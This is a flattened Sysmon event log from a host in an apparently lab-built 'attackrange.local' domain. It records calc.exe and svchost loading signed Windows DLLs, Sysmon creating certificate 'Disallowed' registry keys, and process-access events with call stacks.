12:18:52.120{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace 734700x800000000000000057349267Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.120{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\WinTypes.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Base Types DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWinTypes.dllMD5=9F209F29ABFF007F55328BCC36367005,SHA256=7F2CBE9B349062DFD782032D50C335E6C292EC5F509746941982A7161F24ED84trueMicrosoft WindowsValid 12241200x800000000000000057349266Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.104{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057349265Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.104{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057349264Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.104{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057349263Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.104{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 734700x800000000000000057349262Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.104{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll10.0.14393.4169 (rs1_release.210107-1130)Windows.Shell.ServiceHostBuilderMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Shell.ServiceHostBuilder.dllMD5=BAE7C7806F172B14686A3F22A92B3F6B,SHA256=F99E2CEA34785407A7127920360AC8F34CFE4B982D15B69B3C8B9902ADECECA1trueMicrosoft WindowsValid 12241200x800000000000000057349261Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.104{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349260Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.104{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349259Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.104{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 734700x800000000000000057349258Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.104{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll10.0.14393.4169 (rs1_release.210107-1130)Windows.Shell.ServiceHostBuilderMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Shell.ServiceHostBuilder.dllMD5=BAE7C7806F172B14686A3F22A92B3F6B,SHA256=F99E2CEA34785407A7127920360AC8F34CFE4B982D15B69B3C8B9902ADECECA1trueMicrosoft WindowsValid 12241200x800000000000000057349257Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.104{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349256Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.104{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349255Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.104{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349254Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.104{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349253Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.104{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349252Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.104{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349251Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.104{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349250Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.104{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349249Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.104{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349248Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.104{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349247Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.104{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349246Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.104{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349245Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.104{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349244Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.104{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349243Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.104{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349242Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.104{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349241Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.104{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057349240Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.104{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\actxprxy.dll10.0.14393.3808 (rs1_release.200707-2105)ActiveX Interface Marshaling LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationActXPrxy.dllMD5=087C47C19BBFCB9F4932C03C0189E86B,SHA256=9BEE35FBFA2E595372D82E8858BE46CE7717E0399996960398BC238F4D0E5207trueMicrosoft WindowsValid 734700x800000000000000057349239Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.104{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\actxprxy.dll10.0.14393.3808 (rs1_release.200707-2105)ActiveX Interface Marshaling LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationActXPrxy.dllMD5=087C47C19BBFCB9F4932C03C0189E86B,SHA256=9BEE35FBFA2E595372D82E8858BE46CE7717E0399996960398BC238F4D0E5207trueMicrosoft WindowsValid 12241200x800000000000000057349238Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.104{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057349237Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.104{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 10341000x800000000000000057349236Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.104{8B6011A9-886D-6164-0C00-00000000F101}8489544C:\Windows\system32\svchost.exe{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057349235Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.104{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\propsys.dll7.0.14393.4169 (rs1_release.210107-1130)Microsoft Property SystemWindows® SearchMicrosoft Corporationpropsys.dllMD5=013D2BA96C261CDC62ECA7365E1C84D5,SHA256=26896478B6F1AF3756D5B1BB59BF2C6BE1C579B122CC882BAC35FEFB3EC3EE36trueMicrosoft WindowsValid 10341000x800000000000000057349234Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.104{8B6011A9-886E-6164-1600-00000000F101}13169500C:\Windows\System32\svchost.exe{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057349233Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.104{8B6011A9-886E-6164-1600-00000000F101}13161348C:\Windows\System32\svchost.exe{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057349232Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.104{8B6011A9-886D-6164-0C00-00000000F101}8489544C:\Windows\system32\svchost.exe{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057349231Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.104{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValid 734700x800000000000000057349230Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.089{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057349229Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.089{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057349228Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.089{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\propsys.dll7.0.14393.4169 (rs1_release.210107-1130)Microsoft Property SystemWindows® SearchMicrosoft Corporationpropsys.dllMD5=013D2BA96C261CDC62ECA7365E1C84D5,SHA256=26896478B6F1AF3756D5B1BB59BF2C6BE1C579B122CC882BAC35FEFB3EC3EE36trueMicrosoft WindowsValid 734700x800000000000000057349227Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.089{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 10341000x800000000000000057349226Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.089{8B6011A9-886E-6164-1600-00000000F101}13169500C:\Windows\System32\svchost.exe{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057349225Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.089{8B6011A9-886E-6164-1600-00000000F101}13161348C:\Windows\System32\svchost.exe{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057349224Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.089{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValid 734700x800000000000000057349223Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.089{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057349222Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.089{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057349221Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.089{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 12241200x800000000000000057349220Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057349219Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057349218Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057349217Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349216Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349215Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 734700x800000000000000057349214Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.042{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\ClipSVC.dll10.0.14393.4169 (rs1_release.210107-1130)Client License ServiceMicrosoft® Windows® Operating SystemMicrosoft CorporationClipSVC.dllMD5=96D21C2596ACCF851D333CF78B56ACDB,SHA256=E356FF7A84952095B23AFD106F4A4C164EC31E652D4DE46E2F3B41151184A84DtrueMicrosoft WindowsValid 12241200x800000000000000057349213Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349212Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349211Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349210Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349209Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349208Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349207Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349206Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349205Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349204Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349203Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349202Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349201Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349200Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349199Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349198Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349197Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057349196Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.057{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\Windows.StateRepository.dll10.0.14393.4169 (rs1_release.210107-1130)Windows StateRepository API ServerMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.StateRepository.dllMD5=8F4457905D80A520C684CA48F807C268,SHA256=623299C57C3148EB7B8EE0FE22F2E8A4C7A41712A87D43074E56643BEB84C06AtrueMicrosoft WindowsValid 734700x800000000000000057349195Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.057{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft 